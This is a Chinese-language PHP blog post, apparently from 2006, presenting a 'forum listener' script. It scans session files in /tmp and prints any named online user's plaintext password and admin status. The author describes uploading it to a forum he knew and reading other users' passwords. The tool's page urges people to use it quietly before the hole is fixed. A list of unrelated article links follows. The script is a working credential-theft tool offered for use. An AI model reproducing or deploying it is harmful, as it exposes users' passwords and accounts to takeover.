一个查看session内容的函数


Posted in PHP onOctober 09, 2006

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
  return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
对javascript和select部件的结合运用
Oct 09 PHP
Sorting Array Values in PHP(数组排序)
Sep 15 PHP
CI框架开发新浪微博登录接口源码完整版
May 28 PHP
php中simplexml_load_file函数用法实例
Nov 12 PHP
PHP使用mysql_fetch_object从查询结果中获取对象集的方法
Mar 18 PHP
PHP模板引擎smarty详细介绍
May 26 PHP
php实现的mongodb操作类
May 28 PHP
Session 失效的原因汇总及解决丢失办法
Sep 30 PHP
php的PDO事务处理机制实例分析
Feb 16 PHP
yii2 在控制器中验证请求参数的使用方法
Jun 19 PHP
laravel通用化的CURD的实现
Dec 13 PHP
PHP设计模式入门之迭代器模式原理与实现方法分析
Apr 26 PHP
一个显示天气预报的程序
Oct 09 #PHP
web方式ftp
Oct 09 #PHP
php中文本数据翻页(留言本翻页)
Oct 09 #PHP
自己动手做一个SQL解释器
Oct 09 #PHP
GD输出汉字的函数的分析
Oct 09 #PHP
类的另类用法--数据的封装
Oct 09 #PHP
最小化数据传输――在客户端存储数据
Oct 09 #PHP
You might like
PHP制作图形验证码代码分享
2014/10/23 PHP
php实时倒计时功能实现方法详解
2017/02/27 PHP
PHP中数组转换为SimpleXML教程
2019/01/27 PHP
国外的为初学者写的JavaScript教程
2008/06/09 Javascript
JQUERY 获取IFrame中对象及获取其父窗口中对象示例
2013/08/19 Javascript
JavaScrip调试技巧之断点调试
2015/10/22 Javascript
JavaScript运动框架 链式运动到完美运动(五)
2017/05/18 Javascript
Angular.js前台传list数组由后台spring MVC接收数组示例代码
2017/07/31 Javascript
vue学习笔记之v-if和v-show的区别
2017/09/20 Javascript
vue+element的表格实现批量删除功能示例代码
2018/08/17 Javascript
js中addEventListener()与removeEventListener()用法案例分析
2020/03/02 Javascript
解决vue+webpack项目接口跨域出现的问题
2020/08/10 Javascript
python下载文件时显示下载进度的方法
2015/04/02 Python
Python的Flask框架中Flask-Admin库的简单入门指引
2015/04/07 Python
python实现中文分词FMM算法实例
2015/07/10 Python
python中enumerate函数遍历元素用法分析
2016/03/11 Python
python数据结构链表之单向链表(实例讲解)
2017/07/25 Python
python得到单词模式的示例
2018/10/15 Python
python3中rank函数的用法
2019/11/27 Python
Python HTMLTestRunner库安装过程解析
2020/05/25 Python
scrapy框架携带cookie访问淘宝购物车功能的实现代码
2020/07/07 Python
美国内衣第一品牌:Hanes(恒适)
2016/07/29 全球购物
世界上最好的威士忌和烈性酒购买网站:The Whisky Exchange
2016/11/20 全球购物
如何判断一段程序是由C 编译程序还是由C++编译程序编译的
2013/08/04 面试题
历史系毕业生自荐信
2013/10/28 职场文书
毕业自荐书
2013/12/09 职场文书
十岁生日父母答谢词
2014/01/18 职场文书
大学生怎样写好自荐信
2014/02/25 职场文书
酒店管理专业自荐信
2014/05/23 职场文书
教师国庆节演讲稿范文2014
2014/09/21 职场文书
工伤事故赔偿协议书范文
2014/09/24 职场文书
道路交通事故赔偿协议书
2014/10/24 职场文书
2016春节家属慰问信
2015/03/25 职场文书
如何在CocosCreator里画个炫酷的雷达图
2021/04/16 Javascript
动画电影《龙珠超 超级英雄》延期上映
2022/03/20 日漫
《吸血鬼:避世 血猎》官宣4.27发售 系列首款大逃杀
2022/04/03 其他游戏